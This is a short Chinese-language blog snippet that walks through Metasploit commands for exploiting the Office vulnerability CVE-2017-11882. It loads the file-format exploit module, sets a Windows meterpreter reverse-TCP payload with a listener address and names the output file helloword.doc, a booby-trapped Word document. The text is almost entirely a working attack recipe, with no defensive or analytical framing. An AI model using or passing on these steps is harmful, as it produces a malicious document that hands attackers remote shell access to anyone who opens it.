metasploit利用CVE-2017-11882

./msfconsole

use exploit/windows/fileformat/cve_2017_11882
set URIPATH test
set payload windows/meterpreter/reverse_tcp
set lhost 172.18.126.113
set FILENAME helloword.doc

你可能感兴趣的:(网络编程)